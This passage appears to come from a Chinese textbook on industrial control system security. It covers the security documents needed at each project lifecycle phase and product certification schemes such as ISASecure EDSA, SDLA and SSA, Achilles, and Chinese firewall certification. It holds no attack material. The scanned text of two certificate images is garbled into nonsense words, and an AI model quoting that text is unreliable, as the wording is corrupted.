和尽可能详细的建筑、安装图纸,包括建设项目部分工程的详图,零部件结构明细表,验 收标准、方法,施工图预算等。此设计文件应满足设备材料采购、非标准设备制作和施工 的需要,并注明建筑工程合理使用年限。 通常,建设单位或资产所有者选择工程公司或设计院进行详细设计。在这个阶段,建 设单位选出设备供应商,设备供应商也开始进行设备部分的详细设计和生产部署。 7.4.2 工业控制系统信息安全详细设计 详细设计阶段的目的是根据初步阶段所提出的信息安全功能需求进行详细的系统功能 设计和信息安全设计。 根据资产所有者提供的工业控制系统信息安全高层次评估,工程公司和控制系统集成 商进行工业控制系统信息安全详细等级评估,实施信息安全功能需求。之后,控制系统集 成商会同资产所有者和工程公司开展项目验收测试 (FAT 和 IAT)。 在详细设计阶段,建议提供下列文件: (1)详细的工业控制系统图。 (2)详细的工业控制设备布置图。 (3)培训文档和培训记录。 (4)资产管理程序。 (5)变更管理程序。 (6)详细的区域设计边界和访问控制端口。 (7)工业控制系统信息安全详细等级评估报告。 (8)更新的财产设备、资产、服务、人员等保护等级需求文档。 (9)更新的信息安全方针。 (10)更新的信息安全使命、前景和价值观。 (11)更新的信息安全管理体系。 在详细设计阶段结束时,建议进行第二次信息安全保障检查,进一步确定上述文件已 经准备充分,为后续阶段做准备。 7.5 施 工 调 试 施工调试是工业项目工程的第四个阶段,也是项目工程的最后一个阶段。抓好施工调 试,对项目工程的执行也是很关键的。 7.5.1 施工调试简介 建设实施阶段主要进行施工前的准备、组织施工和竣工前的生产准备三项工作。本阶 段的主要任务是将“蓝图”变成工程项目实体,实现投资决策意图。在这一阶段,通过施 工,在规定的范围、工期、费用、质量内,按设计要求高效率地实现项目目标。在项目建 设周期中本阶段的工作量最大,投入的人力、物力和财力最多,项目管理的难度也最大。 在开工建设项目之前,各项准备工作主要包括获得土地、拆迁、“三通一平(水、 电、道路通,场地平整)”、组织施工设备、材料订货,准备必要的施工图纸,组织施工招 投标,择优选定施工单位。 接下来是项目设备进场安装、调试、集成调试和验收测试。 7.5.2 工业控制系统信息安全施工调试 施工调试阶段的目的是根据工业控制系统信息安全需求和运行环境对系统进行开发和 实施,并对系统建成后的信息安全功能进行验证。 根据工业控制系统信息安全详细等级评估,实现信息安全功能需求。在现场验收测试 (SAT) 后,资产所有者接收控制系统并使之投入运行。同时,会同 IT 人员做好公司网与 控制网之间的搭建工作,做好访问控制。 在施工调试阶段,建议提供下列文件: (1)详细的工业控制系统图。 (2)详细的工业控制设备布置图。 (3)培训文档和培训记录。 (4)控制系统测试记录。 (5)资产管理程序。 (6)变更管理程序。 (7)详细的区域设计边界和访问控制端口。 (8)工业控制系统信息安全详细等级评估报告。 (9)更新的财产设备、资产、服务、人员等保护等级需求文档。 (10)更新的信息安全方针。 (11)更新的信息安全使命、前景和价值观。 (12)更新的信息安全管理体系。 在施工调试阶段结束时,项目会进行竣工验收。此时建议进行第三次信息安全保障检 查,进一步确定上述文件已经准备充分,为后续运行维护做准备。 7.6 运 行 维 护 运行维护是工业项目工程结束后的第一个阶段,是工业生产的开始阶段。认真做好运 行维护,是工业生产的基本要求。 7.6.1 运行维护简介 运行维护阶段主要进行工业生产运行管理和设备维护管理两项工作。本阶段的主要任 务是保证工业生产的稳定运行,实现预定的生产目标。 7.6.2 工业控制系统信息安全运行维护 工业控制系统信息安全运行维护是一项长期而又艰巨的任务。了解和控制运行过程中 的安全风险是工业控制系统信息安全运行维护阶段的主要工作。 根据工业控制系统信息安全管理体系,资产所有者做好控制系统的运行和符合性监 视,必要时可获得系统集成商或控制系统供应商的支持。 在运行维护阶段,建议做好下列文件: (1)控制系统运行记录。 (2)资产管理程序。 (3)变更管理程序。 (4)区域设计边界和访问控制端口文件。 (5)工业控制系统信息安全详细等级评估报告。 (6)财产设备、资产、服务、人员等保护等级需求文档。 (7)信息安全管理体系。 (8)补丁管理程序。 7.7 升 级 优 化 升级优化是工业生产的必经阶段。认真做好升级优化,是工业生产顺利进行的有效保证和支撑。 7.7.1 升级优化简介 升级优化阶段主要进行工业控制系统升级和优化两项工作。本阶段的主要任务是保证 工业生产的稳定运行,有条件地实施工业控制系统的升级和优化,提高工业控制系统的可 靠性和稳定性。 7.7.2 工业控制系统信息安全升级优化 工业控制系统信息安全升级优化是一项长期工作,应理解工业控制系统的生命周期, 及时发现控制系统的漏洞和不完善之处,积极应对不断增长的工业控制系统安全要求。 根据工业控制系统信息安全管理体系,资产所有者做好控制系统信息安全的升级和优 化工作,必要时可获得系统集成商或控制系统供应商的支持。 在升级优化阶段,建议做好下列文件: (1)控制系统升级优化记录。 (2)资产管理程序。 (3)变更管理程序。 (4)区域设计边界和访问控制端口文件。 (5)工业控制系统信息安全详细等级评估报告。 (6)财产设备、资产、服务、人员等保护等级需求文档。 (7)信息安全管理体系。 (8)补丁管理程序。 (9)控制系统升级优化培训记录。 第 8 章 工业控制系统信息安全产品认证 8.1 产品认证概述 工业控制系统信息安全必须通过工业控制系统产品来实现。这里所说的产品包括控制 系统内所有与信息安全相关的设备。 下面对产品认证的意义、产品认证的范围和产品认证的检测技术进行简单分析。 8.1.1 产品认证的重要意义 工业控制系统信息安全产品认证对于保护工业控制系统信息安全有着极其重要的意 义,能促进工业控制系统产业的进步与成熟;帮助工业控制系统及安全产品的供应商及时 发现问题,用更高、更严的标准规范产品开发流程,提高工业控制系统及其安全产品的市 场竞争力;有利于国家对工业控制系统及其安全产品的市场准入进行管理,保证工业控制 系统运营单位采购产品的安全性;帮助工业控制系统运营单位强化员工的信息安全意识, 规范组织信息安全行为,降低潜在的风险隐患。 鉴于工业控制系统信息安全产品认证的重要意义,各国政府、行业协会、学术机构及 相关企业等单位都积极推动此项工作的开展,依托现有工业控制系统信息安全标准,推进 产品认证项目,设计认证制度。 8.1.2 产品认证的范围 第 4 章中我们提到工业控制系统信息安全所需考虑的系统范围,在这个范围里的产 品,如工业防火墙、各种服务器及工作站、DCS 控制器、SIS 控制器、PLC 、RTU 等,都 必须进行产品认证。产品认证的范围如图8-1 中的考虑系统界限范围所示。 对于工业控制系统信息安全系统界限范围外的产品,如检测仪表、控制阀、电动机控 制单元等,是否要考虑其信息安全产品认证, 目前尚无定论。但是,我们可以看到,随着 总线技术、智能现场设备和无线技术的应用,工业控制系统信息安全所需考虑系统的范围 必然会扩大,相应的产品认证范围也会扩大,这都需要大家关注。 第8章 工业控制系统信息安全产品认证 图8-1 产品认证范围界定举例 8.1.3 产品认证的检测技术 工业控制系统信息安全产品认证的检测技术也在逐步完善。目前,这些检测技术包括 构建工业控制系统漏洞库、工业控制系统漏洞库扫描技术、工业控制协议模糊测试,以及 工业病毒行为特征提取与攻击模拟技术等。 1. 构建工业控制系统漏洞库 鉴于工业控制系统在操作系统、应用软件和通信协议方面的特殊性,传统信息技术系统 漏洞库并不适用于工业控制系统安全测试领域。因此,需要构建工业控制系统专有漏洞库。 工业控制系统漏洞数据库如图8 - 2 所示。通过工业控制系统在操作系统、应用软件、 通信协议等上的漏洞收集和分析,找出解决方案,并生成测试用例。 工业控制系统漏洞数据库的构建在国外 一 些认证机构已经有 一 定积累,但在我国还在 起步阶段。 2. 工业控制系统漏洞库扫描技术 基于工业控制系统漏洞库的漏洞扫描技术,依靠漏洞扫描引擎、检测规则的自动匹配,通过工业控制系统漏洞库,扫描工控系统中的关键设备,检测工控系统的脆弱性。以 智能电网系统为例,绘制其漏洞扫描技术原理图。 工业控制系统漏洞扫描技术支持 Modbus 、DNP3 、Profinet 等工业通信协议漏洞,支持 ICMP Ping 扫描、端口扫描等传统扫描技术。 3. 工业控制协议模糊测试 面向工业控制协议的模糊 (Fuzzing) 测试,其原理图如图8 - 4所示。 图 8 - 4 面 向 工 业 控 制 协 议 的 Fuzzing 测 试 原 理 图 通过运用模糊测试原理,设计变异测试用例并构造变异报文,检查工业控制协议实现的缺陷。 构建完整、可扩展的动态随机分析测试框架,监控测试目标,管理测试结果,并支持 多目标(如文件、网络协议等)、多协议(如 Modbus TCP、DNP3 等不同类型的协议)、 多线程(加速测试进度)。 4. 工业病毒行为特征提取与攻击模拟技术 工业病毒行为特征提取与攻击模拟技术的原理如图8 - 5所示。 图8-5 工业病毒行为特征提取与攻击模拟技术原理图 根据数据挖掘智能认知工业病毒攻击行为,实现工业病毒行为判定,提取工业病毒行 为特征。 根据网络流量情况、具体协议内容、交互模式及主机或设备行为,检测工业控制环境 特种木马等复杂攻击。 8.2 产品认证机构 由于工业控制系统信息安全认证的重要性,各国政府、行业协会、学术机构及相关企 业等单位都积极推动此项工作的开展,依托现有工业控制系统信息安全标准,推进认证项 目,设计认证制度,建立认证机构,为工业控制系统信息安全产品认证搭建测试平台。 目 前 ,ISA 安全符合性研究院的 ISASecure 嵌入式设备安全保障认证 (Embedded Device Security Assurance,EDSA) 、Wurldtech 的 Achilles 认证、全球工业网络安全专业认证 (Global Industrial Cyber Security Professional,GICSP) 是工业控制系统信息安全领域已推 出且得到业界普遍认可的信息安全认证。 8.2.1 国外产品认证机构 国外工业控制系统产品的研发和生产比较广,其信息安全产品认证机构建立得也比较 早,主要分布在美国、德国、法国、加拿大、日本等国家。 由于工业控制系统信息安全刚刚起步,其他国家也在加紧建立其信息安全产品认证机构。下面对已建立的国外工业控制系统信息安全产品认证机构进行介绍。当然,由于工业控制系统信息安全刚刚兴起,许多国家都在建立此类认证机构,本书只简单介绍其中几家。 1.ISA 信息安全符合性研究院 ISA 信息安全符合性研究院 (ISA Security Compliance Institute,ISCI)是美国仪表 协会 (ISA) 自动化标准符合性研究院 (ASCI) 于2007年成立的一个由工业控制系统运 营单位、产品供应商及工业组织组成的合作机构,其任务是为工业控制系统产品的测 试和认证建立一套很好的技术规范和流程,对工业控制系统信息安全标准的符合性进 行认证。 ISCI 通过推行 ISASecure 项目开发 ISASecure 认证规范。ISASecure 认证规范均由工 业控制系统运营单位、行业协会、用户、学术界、政府和监管机构合作共同审核,帮助工 业控制系统设备供应商和运营单位识别网络安全产品并实践,可授权第三方测试实验室进 行信息安全认证。 ISASecure 认证包含功能性信息安全评估 (FSA) 、 软件开发信息安全评估 (SDSA) 和通信鲁棒性测试 (CRT) 三个方面。目前, ISASecure 认证已经开始针对嵌入式设备安 全保障 (EDSA) 认证,对安全开发生命周期保障 (SDLA) 认证和系统安全保障 (SSA) 认证还在规划中。 目前授权的 ISASecure 测试实验室有 JAB CCSC 和 Exida LLC。 目前认可的 ISASecure 嵌入式设备安全保障的通信鲁棒性测试 (CRT) 平台有三个, 分别是 Codenomicon 的 Defensics 、FFRI 的 Raven 和 Wurldtech 的 Achilles。 2.Exida LLC Exida LLC 是 ANSI/ACLASS 认可的认证机构,于1999 年建立,总部在美国,在德 国、英国、亚太地区均有分支机构,可以提供功能性安全认证、报警管理认证和工业控制 系统信息安全认证。 Exida LLC 是 ISCI 授权的测试实验室。 3.Wurldtech Wurldtech 是总部在加拿大的一家专业的工业控制系统信息安全认证公司,在美国和 荷兰有分支机构,于2006年成立,并于2014年被通用电气 (GE) 收购。 Wurldtech 的 Achilles 测试工具采用漏洞扫描和模糊测试方法,测试工业控制系统中 设备和软件的安全问题,在业界享有很高的知名度。 Wurldtech 的 Achilles 认证确保产品供应商的相关产品、系统和服务可以满足最终客 户的工业控制系统信息安全标准,已成为事实上的行业标准。Achilles 认证主要有通信认 证和实践认证。 Achilles 通信认证主要是针对关键基础设施中常见的利用有线或无线通信协议的应 用、设备和系统间健壮性的测试认证。通过该认证的产品,已经达到通信稳定性的最高标 准要求,可以有效地防范上万种“零日漏洞”,以及其他未公开的漏洞或隐患。目前,来 自全球前十大自动化公司中8个(如 Siemens、Schneider、ABB、HIMA、HIRSCHMANN等)公司的自动化产品已经成功通过了 “Achilles 通信认证”的所有要求。适用于 “Achilles 通信认证”的产品有以下几种。 (1)嵌入式设备:运行嵌入式软件,用于实现监视、控制,或者执行工业过程控制的 设备,如 PLC 、SIS 或 DCS 等。 (2)主机设备:运行通用操作系统完成多个应用、数据存储等功能的设备,如 HMI、 工程师站等。 (3)控制应用:作为过程控制接口,在嵌入式、主机或网络设备中执行的软件程序, 如 HMI 软件、历史数据库软件、PLC 逻辑等。 (4)网络组件:实现了数据传输或限制了数据流的设备,如路由器、交换机、网关、 防火墙、无线设备等。 Achilles 实践认证主要依据国际仪器用户协会 (WIB) 为工业控制系统产品供应商建 立的一整套要求来评估安全工程流程,这些要求是 Wurldtech 根据35 个重要的过程现场 中评估了人、流程和执行的过程后开发的272个安全基准。通过该认证的产品供应商,可 以确保系统的整个开发周期,包括实施、维护和退市等都符合最好的安全管理实践。最重 要的是,该认证也符合 WIB 的测试要求。该协会的50多家全球企业巨头已经将该认证作 为企业的强制性标准,要求他们的产品供应商需通过该认证。目前, Siemens、 Honeywell 、Emerson 、Invensys 等产品供应商已经成功获得该认证。“Achilles 实践认证” 完全参照IEC62443-2-4 标准进行执行。 Wurldtech 的 Achilles 测试平台是认可的 ISASecure 嵌入式设备安全保障认证中的通 信鲁棒性测试 (CRT) 平台。 4.JAB(Japan Accreditation Bureau) JAB (日本认证局)是 ANSI/ACLASS 认可的认证机构,于2012 年建立控制系统信 息安全中心 (Control System Security Center)。 JAB CSSC 是 ISCI 授权的测试实验室。 5.Codenomicon Codenomicon 是总部在芬兰的专业提供信息安全的公司,在美国和亚太地区均设有分 支机构,于2001年成立。 Codenomicon 的 Defensics 工控健壮性/安全性测试平台,采用基于主动性安全漏洞挖 掘的健壮性评估与管理方案,与ISASecure 合作,遵循 IEC 62443 标准。 Codenomicon 的 Defensics 测试平台是认可的 ISASecure 嵌入式设备安全保障认证中 的通信鲁棒性测试 (CRT) 平台。 6.GIAC 机构 全球工业网络安全专业认证(Global Industrial Cyber Security Professional,GICSP) 是全球信息保障认证 (GIAC) 机构的一种认证,是基于ANSI/ISO/IEC 17024的信息安全 认证,也是全球范围内工业控制系统在网络安全领域的网关认证。 8.2.2 国内产品认证机构 国内工业控制系统产品的研发和生产速度比较慢,其信息安全产品认证机构建立 的速度也比较慢。 我国在工业防火墙方面已有产品认证机构,也在加紧建立其他工业控制系统信息安全 产品认证机构。 下面对已建立的国内工业控制系统信息安全产品认证机构进行介绍。 1. 公安部第三研究所信息系统安全产品检验中心 公安部第三研究所信息系统安全产品检验中心(以下简称检验中心)是在“公安部计 算机信息系统安全产品质量监督检验中心”的基础上于2003 年成立的,是公安部为了加强 计算机信息产品安全等级检测与系统安全保护等级评估的技术工作,根据原国家发展计划 委员会(计高技〔2000〕2037号)的要求设立的,于2004年10月28日通过国家质量监督 检验检疫总局的计量认证((2004)量认(国)字 (L2408) 号)和公安部部级中心的审查 认可。同年,通过中国实验室国家认可委员会认可,是具有第三方公证地位的检验机构。 检验中心的主要工作是信息安全产品的检测和系统测评。 目前专用信息安全产品均需要申请销售许可证, 一般流程是申请测试—测试通过一申 领销售许可证。 检测通过后才能向公安部申请销售许可证。 工控主机一般不部署杀毒软件,即使部署了也不能保证及时更新病毒库,也没有相应 鉴权鉴别的访问控制措施。主机防护产品采取铠甲式外挂,实现人员审核与访问控制、操 作行为与审计、数据安全交换与杀毒功能。其特色就是在不对工控主机采取任何软硬件加 载的前提下提高安全性。 在工控系统测评方面,主要是借鉴计算机等级保护制度,从技术和管理两个方面对工 控系统运行的环境和使用的人员进行测评,保证其在测试点的安全合规性,以及测试点之 间的动态安全性。目前相关的技术要求和测评方法正在制定过程中。 2. 中国信息安全测评中心 中国信息安全测评中心是我国专门从事信息技术安全测试和风险评估的权威职能机 构,创立于1997年。 中国信息安全测评中心的主要职能包括:负责信息技术产品和系统的安全漏洞分析与 信息通报;负责党政机关信息网络、重要信息系统的安全风险评估;开展信息技术产品、 系统和工程建设的安全性测试与评估;开展信息安全服务和专业人员的能力评估与资质审 核;从事信息安全测试评估的理论研究、技术研发、标准研制等。 中国信息安全测评中心是国家信息安全保障体系中的重要基础设施之一,在国家专项投 入的支持下,拥有国内一流的信息安全漏洞分析资源和测试评估技术装备;建有漏洞基础研 究、应用软件安全、产品安全检测、系统隐患分析和测评装备研发等多个专业性技术实验室;具有专门面向党政机关、基础信息网络和重要信息系统开展风险评估的国家专控队伍。 目前,工业防火墙的信息安全测评由中国信息安全测评中心负责。 3. 中国信息安全认证中心 (ISCCC) 中国信息安全认证中心是经中央编制委员会批准成立,由国务院信息化工作办公室、 国家认证认可监督管理委员会等八个部委授权,依据国家有关强制性产品认证、信息安全 管理的法律法规,负责实施信息安全认证的专门机构。 中国信息安全认证中心是唯一被指定为国家信息安全产品认证的机构,负责实施国家 信息安全产品认证。获得国家信息安全产品认证证书的产品,表明其符合相应的信息安全 规范和标准要求。 8.3 产 品 认 证 8.3.1 工业防火墙认证 工业防火墙是工业控制网络隔离的关键设备,因此,工业防火墙的安全认证尤为重要。 了解工业防火墙的认证,熟悉其认证流程,对构建工业控制系统信息安全是有帮助的。 目前,市面上出现了一些工控防火墙,其认证证书各不相同,有来自国外的,也有来 自国内的。为了进一步了解这方面的知识,本节将对市面上常见的工业防火墙认证进行分 析,未列入的工业防火墙请各自找产品参考。 1. 国外工业防火墙认证 国外的工业控制系统信息安全认证机构比较多,其工业防火墙认证兴起得比较早。随 着工业控制系统信息安全的发展和需求,国外工业防火墙进入我国市场,在各个工业领域 都有运用。国外工业防火墙认证比较常见的是 Wurldtech 的 Achilles 认证、Byres 的 MUSIC 认证等。 下面以 Wurldtech 的 Achilles 认证为例,介绍国外工业防火墙的认证情况。 Wurldtech 的 Achilles 认证共分为以下两个级别。 (1)Level 1: 该级别测试和监视受测设备基于 Ethernet 、ARP 、IP 、ICMP 、TCP 和 UDP 的数据包的详细执行过程,用于验证是否满足 OSI2-4 层定义的可靠性和稳定性级别 要求。该级别已经成为工控产品健壮性的行业标杆,并得到全球主要自动化产品供应商和 全球工业企业巨头的认可。 (2)Level 2: 该级别是Level 1认证的扩展,采用了更多测试和更多通信成功/失败要 求。Level 2 通过进一步产生更多测试值、检测协议状态、使用更高频率的 DoS 攻击测试 每一种通信协议。 Achilles 认证的工业防火墙是 “Achilles 通信认证”产品中的网络组件部分。 Wurldtech 的 Achilles 测试工具采用漏洞扫描和模糊测试的方法,测试工控系统中设 备和软件的安全问题。 Wurldtech 的 Achilles 认证专为产品供应商量身打造的认证过程包括认证范围、供应 商准备、评估和生成报告四个阶段。 经过 Wurldtech 的 Achilles 认证的工业防火墙,可以获得 Achilles 认证证书。该认证 证书如图8-6所示。 Certificate f Compliance This is to certfy that the: Emerson Smart Firewall Manufactured by: Emerson Process Management s in complhamr wilh the mquiremcnts set forth by Achilles Level I Certification he Genfa Tha Ceifsale s haed wstes t Warihsh Sowny Tntad yinthe. n anthg* mh dihe AhanLeetl CERTIFICATENO.CERT 90-31013 1.0 v1.1-33370 SUWTWAEE VFESON N/A wurldtech 图8-6 Achilles 产品认证证书 当然,国外工业防火墙除获得上述信息安全认证外,还需获得其他相关的产品认证, 在此不做介绍。 2. 国内工业防火墙认证 国内工业防火墙的认证必须通过公安部独立性产品测试,取得信息技术产品安全测评 证书、国家信息安全产品认证证书和工控防火墙销售许可证。 1)独立性产品测试与销售许可证 由于现在工业控制信息安全产品的标准尚在制定过程中,没有可以直接用于检测的标 准作为依据,所以现在的测试依据现有的类似产品标准(如工业防火墙就是参照传统防火 墙的标准),抽取适用性条款,再补充测试适用于工业控制环境的其他要求,特别是协议 支持方面的内容。 第8章 工业控制系统信息安全产品认证 以工业防火墙为例,大部分传统防火墙的要求均适用,但对 NAT、 路由不做要求。 工业控制环境的要求主要包括: (1)支持基于白名单策略的访问控制,包括网络层和应用层。 (2)工业控制协议过滤,应具备深度包检测功能,支持主流工控协议的格式检查机 制、功能码与寄存器检查机制。 (3)支持动态开放 OPC 协议端口。 (4)工业防火墙应支持多种工作模式,保证防火墙的区分部署和工作过程,以实现对 被防护系统的最小影响。例如,学习模式,防火墙记录运行过程中经过防火墙的所有策 略、资产等信息,形成白名单策略集;验证模式或测试模式,该模式下防火墙对白名单策 略外的行为做告警,但不拦截;工作模式,即防火墙的正常工作模式,严格按照防护策略 进行过滤等动作保护。 工业防火墙应具有高可靠性,包括故障自恢复、在 一 定负荷下72小时正常运行、无 风扇、支持导轨式或机架式安装等。 工业防火墙的功能测试拓扑图如图8-7 所示,将待测的工业防火墙串联部署在内、外 网之间,通过内、外网的工控协议模拟器建立通信,来测试在防火墙上配置的策略。 现场总线 图8-7 工业防火墙的功能测试拓扑图 工业防火墙检验通过后再向公安部申请销售许可证,其检验报告和销售许可证分别如 图8-8和图8-9所示。 8.3.2 嵌入式设备安全保障认证 1. 嵌入式设备安全保障 (EDSA) 认证简介 ISA 信息安全符合性研究院通过推行 ISASecure 项目开发 ISASecure 认证规范, ISASecure 认证规范均由工业控制系统运营单位、行业协会、用户、学术界、政府和监管 机构合作共同审核,帮助工业控制系统设备供应商和运营单位识别网络安全产品及实践。 ISA 信息安全符合性研究院推行的 ISASecure 项目之一是嵌入式设备安全保障 (EDSA) 认证。EDSA 作为第一个 ISASecure 认证项目,目的在于促进工业行业加强工业 控制系统的网络安全。 嵌入式设备主要由嵌入式处理器、相关支撑硬件和嵌入式软件组成,是集软硬件于一 体的可独立工作的器件。嵌入式设备包括但不仅限于 PLC 、DCS 控制器、安全逻辑控制 器 (SLC) 、 可编程自动控制器 (PAC) 、 智能电子设备 (IED) 、 数字保护继电器、智能电 动机控制器、SCADA 控制器、远程终端单元 (RTU) 、 汽轮机控制器、振动监控控制器、 压缩机控制器。 嵌入式设备具备便利灵活、性价比高及嵌入性强等特点,广泛应用于工业控制系统 中,直接监视、控制或执行工业过程。EDSA 提供了一套通用的设备及过程规范,从设备 开发、生产、采购等各阶段保障嵌入式设备的安全。 2. 嵌入式设备安全保障 (EDSA) 认证要素 根据不断发展的工业设备安全趋势,EDSA 提供安全保障要求逐级提高的三个设备认 证级别为级别1、级别2和级别3。这三个级别都对以下三个技术要素进行认证:软件开 发安全性评估 (Software Development Security Assessment,SDSA)、功能安全性评估 (Functional Security Assessment,FSA)、通信健壮性测试(Communication Robustness Testing,CRT) 。SDSA 用于检测设备在开发过程中的安全性; FSA 用于审查设备功能的 安全性;CRT 用于测试设备在从正常到极高网络速率下遭受正常和异常网络流量时保证 必要服务的能力。级别2和级别3对于 SDSA 和 FSA 的要求是逐级递增的, CRT 标准适 用于各个级别。EDSA 认证架构如图8-15所示。 图8- 15 EDSA 认证架构 嵌入式设备安全保障 (EDSA) 认证要素如图8-16所示,三个要素介绍如下。 图8- 16 EDSA 认证要素 1)软件开发安全性评估 (SDSA) 考虑到嵌入式设备开发的整个生命周期, SDSA 的认证要求包括:安全要求规范、软 件架构设计、安全风险评估和威胁建模、详细的软件设计、文档安全指引、软件模块执行 和核查、安全集成测试、安全过程验证、安全响应中心规划、安全性验证测试、安全响应 执行、安全性管理流程等。 通常, SDSA 的基本标准适用于所有认证级别,随着认证级别的递增,认证要求逐渐 严格。例如,所有级别的 ISASecure 嵌入式设备需要确立书面的安全要求与指定的适用范 围。再如,所有认证级别要求改变管理过程,然而级别2和级别3会对这一过程提出更多 的要求。 2)功能安全性评估(FSA) FSA 从安全功能和执行准确性的角度来测试嵌入式设备。嵌入式设备的安全功能可能 由嵌入式设备本身或系统环境中支持该设备的更高级别组件来决定,例如,在某些情况 下,特定设置的防火墙需与其他设备一起部署才能实现安全性。FSA 的组织形式遵照 ISA-99.03.03 系统安全要求和安全保障级别所公认的 ISA99 基金会要求,涉及范围包括访 问控制、使用控制、数据完整性、数据可信度、数据流量限制、及时响应事件、网络资源的可用性等。 通常, FSA 的基本标准适用于各级别认证,随着认证级别的递增,FSA 的标准会相 应提高。例如,各级别的 ISASecure 设备必须支持自动执行基于授权用户的访问控制,除 非此功能被明确分配给更高级别系统结构中的组件。 3)通信健壮性测试 (CRT) CRT 用于测试嵌入式设备或其他关联设备在非正常或恶意网络通信流量的情况下执行 网络协议的情况, CRT 又称为“协议模糊测试”。在不同的流量速率下,生成无效的消息 和消息序列发送至嵌入式设备,设备对于每种协议已知攻击的对抗程度也是本测试的一部 分内容。 当出现不正常的信息响应或设备无法继续保证基本服务时,表明设备存在潜在安全漏 洞 ,CRT 不检查执行的正确性或是否符合强制性控制协议标准的规定。因此,ISASecure CRT 的一个关键定义是“充分保证必要的服务”,这些必要的服务包括过程控制/安全回 路、过程视图、命令(如改变过程控制参数的设定点)和过程警报。通过 ISASecure 的该 项测试,过程控制/安全回路需要适应所有网络流量条件,当然也可以允许一些必要服 务,如提供关键过程的历史信息,对照控制通信由于网络接口的大流量而不是由于其他网 络流量条件的干扰而丢失。 ISCI 为表8-1 中的协议开发 CRT 规范,按照优先级将协议分组,其中,优先级由高 到低依次为组1、组2、组3、组4和组5。 表8-1 ISCl为协议开发的 CRT 规范表 组1 组2 组 3 组4 组 5 IEEE 802.3 (Ethernet) ARP IPv4 ICMPv4 TCP UDP BOOTP DHCP DNS NTP,SNTP FTP,TFTP HTTP SNMPv1-2 Telnet HTTPS TLS Modbus/TCP IPv6 OPC Ethernet/IP/CIP Profinet FFHSE Selected wireless protocols/stacks with elements such as IEEE 802.11 ISA100.1la SNMPv3 SSH Server OPC-UA MMS IEC61850 SMTP 3. 嵌入式设备安全保障 (EDSA) 认证设备清单 满足 ISASecure 认证规范的嵌入式设备可以获得 ISASecure EDSA 的认证证书,拥有 该认证的产品即拥有了一个标志,证明其产品在安全特性和功能上得到了认可。目前,已 有一些工业控制系统设备获得了 ISASecure 嵌入式设备安全保障认证证书, ISASecure EDSA 认证设备一览表如表8-2所示。 表8-2 ISASecure EDSA 认证设备一览表(部分摘录) 供 应 商 类 型 型 号 版 本 等 级 Honeywell Safety Manager HPS 1009077 C001 R145.1 EDSA 2010.1 Level 1 RTP Safety Manager RTP 3000 A4.36 EDSA 2010.1 Level 2 Honeywell DCS controller Experion C300 R400 EDSA 2010.1 Level 1 Honeywell Fieldbus controller Experion FIM R400 EDSA 2010.1 Level 1 Yokogawa Safety control system ProSafe-RS R3.02.10 EDSA 2010.1 Level 1 Yokogawa DCS controller CENTUM VP R5.03.00 EDSA 2010.1 Level 1 Hitachi DCS controller HISEC 04/R900E 01-08-A1 EDSA 2010.1 Level 1 Azbil DCS controller Harmonas/Industrial-DEO/Harmonas- DEO system Process Controller DOPCIV (Redundant type) R4.1 EDSA 2010.1 Level 1 ISASecure EDSA 认证证书如图8-17所示。 Certificate /Certificat Zertifikat / 合格艇 HPS 1108033 C001 Experion8 C300 Controller Honeywell Prooess Solutions e Embedded Device Security 图8-17 EDSA 认证证书举例 8.3.3 安全开发生命周期保障认证 ISA 信息安全符合性研究院推行的 ISASecure 项目之一是安全开发生命周期保障 (SDLA) 认证。 安全开发生命周期保障 (SDLA) 认证项目用于控制系统产品供应商的开发生命周期 过程。 一个 SDLA 证书可以授予以下三种情况: (1)一个提名的开发组织或多个组织。 (2)一个指定的提名且有文档记录的开发生命周期的版本,版本由组织控制。 (3)认证级别为1、2、3、4。 为一个过程设立的四个认证级别是为开发生命周期安全保障提供逐渐增长的级别。这 些认证级别称为 ISASecure SDLA级 别 1 、ISASecure SDLA 级 别 2 、ISASecure SDLA 级别 3 和 ISASecure SDLA 级别4。 记录的过程本身应指明是否适应系统、组件或系统和组件,以及该组织的产品范围。 为了使 ISASecure SDLA 认证达到某个特定的认证级别,认证机构需要评估该组织过 程明确记录的版本,估计其是否满足 SDLA 规范要求;另外,认证机构要审查代表性产 品,核实该过程范围的产品遵循每项 ISASecure 要求。产品供应商应提供不同要求的包括 有代表性的产品在内的产品清单,认证机构可从中选择审查。 产品供应商的开发生命周期经评估满足 ISASecure SDLA 认证规范,该产品供应商可 以获得 ISASecure SDLA 的认证证书,并且可以显示 ISASecure 标志。证书的参考号为一 个3位数的认证版本,对应于认证的 ISASecure 规范。例如,证书的参考号为 ISASecure SDLA 2.6.1,Level 2。 目前,此项认证项目正在开发中,部分认证产品已在市场上推出。 8.3.4 系统安全保障认证 1. 系统安全保障 (SSA) 认证简介 ISA 信息安全符合性研究院推行的ISASecure 项目之一是系统安全保障 (SSA) 认证。 系统安全保障 (SSA) 认证是针对控制系统某个特定部分的认证项目。 一个控制系统 的产品满足下面几项准则即可进行 SSA 认证: (1)该控制系统由 一整套组件组成。 (2)该控制系统可用且由一家供应商支持,当然其中的硬件和软件可来自几个制造商。 (3)该供应商已给控制系统分配一个独特的产品标识,整体是一套组件。 (4)该系统需进行组态控制和版本管理。 2. 系统安全保障 (SSA) 认证要素 供应商要获得系统安全保障 (SSA) 认证,必须通过一个安全开发生命周期过程的评 估。此评估可作为 SSA 评估的一部分,或者前面已完成,即该供应商持有 SDLA 过程认 证。供应商可以同时申请 SSA 认证和 SDLA 认证。ISASecure SSA 认证有四个额外要素: 系统安全开发样品(SDA-S) 、 系统功能安全性评估 (FSA-S) 、 嵌入式设备功能安全性评 估 (FSA-E) 和系统健壮性测试 (SRT)。 SDA-S 是供应商申请系统认证时的检查样品,这些样品出自供应商安全开发过程; FSA-S 是系统的安全能力; FSA-E 用于检查系统组件中嵌入式设备的安全能力; SRT 有 三 个单元,即漏洞识别测试 (VIT) 、 通信健壮性测试 (CRT) 和网络应力测试 (NST) 。VIT扫描系统所有组件,查看是否有已知的漏洞出现。CRT 和 NST 核实在网络接口处从正常 到极高网络速率下遭受正常和异常网络流量时系统是否足够维持必要的功能。 ISASecure SSA 认证要素如图8-18所示。 图8-18 SSA 认证要素 如果前面提到ISASecure EDSA 认证的嵌入式设备是系统的组件,那么该系统的 SSA 认证过程可以进行相应调整。尤其是其中系统的一个组件是经 ISASecure EDSA 认证的嵌 入式设备,那么 SSA 认证过程中的 FSA-E 和 SRT 中的 CRT 不必测试,因为这些评估在 ISASecure EDSA 认证过程中已做过。 3. 系统安全保障 (SSA) 认证设备清单 目前,此项认证项目正在开发中,部分认证产品已在市场上推出。 8.4 产品认证趋势 